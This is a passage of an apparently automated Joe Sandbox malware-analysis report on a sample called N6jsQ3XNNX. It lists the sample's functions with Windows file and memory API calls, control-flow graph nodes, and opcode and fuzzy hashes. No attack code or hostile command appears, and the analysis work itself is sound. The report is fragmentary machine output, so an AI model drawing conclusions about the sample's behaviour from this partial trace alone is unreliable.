                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID: .tmp
                                                                                • API String ID: 1375471231-2986845003
                                                                                • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                                • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                                • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5
                                                                                Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 325 4076e8-4076ea call 40748c 322->325 326 4076ef-4076f2 322->326 324 407770-407785 323->324 330 407787 324->330 331 4077f9 324->331 325->326 328 407700-407704 326->328 329 4076f4-4076fb call 4073ec 326->329 329->328 333 40778a-40778f 330->333 334 4077fd-407802 330->334 335 40783b-40783d 331->335 336 4077fb 331->336 339 407803-407819 333->339 341 407791-407792 333->341 334->339 337 407841-407843 335->337 336->334 340 40785b-40785c 337->340 339->340 347 40781b 339->347 342 4078d6-4078eb call 407890 InterlockedExchange 340->342 343 40785e-40788c 340->343 344 407724-407741 341->344 345 407794-4077b4 341->345 366 407912-407917 342->366 367 4078ed-407910 342->367 359 407820-407823 343->359 362 407890-407893 343->362 348 407743 344->348 349 4077b5 344->349 345->349 354 40781e-40781f 347->354 355 407746-407747 348->355 356 4077b9 348->356 352 4077b6-4077b7 349->352 353 4077f7-4077f8 349->353 352->356 353->331 354->359 355->321 360 4077bb-4077cd 355->360 356->360 363 407824 359->363 364 407898 359->364 360->337 365 4077cf-4077d4 360->365 362->364 368 407825 363->368 369 40789a 363->369 364->369 365->335 373 4077d6-4077de 365->373 367->366 367->367 371 407896-407897 368->371 372 407826-40782d 368->372 374 40789f 369->374 371->364 375 4078a1 372->375 376 40782f 372->376 373->324 384 4077e0 373->384 374->375 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->335 380->354 381->383 383->374 385 4078b1-4078bd 383->385 384->353 385->364 386 4078bf-4078c0 385->386
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B
                                                                                Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLibraryLoadMode
                                                                                • String ID:
                                                                                • API String ID: 2987862817-0
                                                                                • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                                Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                                APIs
                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastRead
                                                                                • String ID:
                                                                                • API String ID: 1948546556-0
                                                                                • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                Function 00405270 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                  • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                  • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                • String ID:
                                                                                • API String ID: 1658689577-0
                                                                                • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID:
                                                                                • API String ID: 442123175-0
                                                                                • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FormatMessage
                                                                                • String ID:
                                                                                • API String ID: 1306739567-0
                                                                                • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEndOfFile.KERNEL32(?,02094000,0040A08C,00000000), ref: 004076B3
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 734332943-0
                                                                                • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrev
                                                                                • String ID:
                                                                                • API String ID: 122130370-0
                                                                                • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
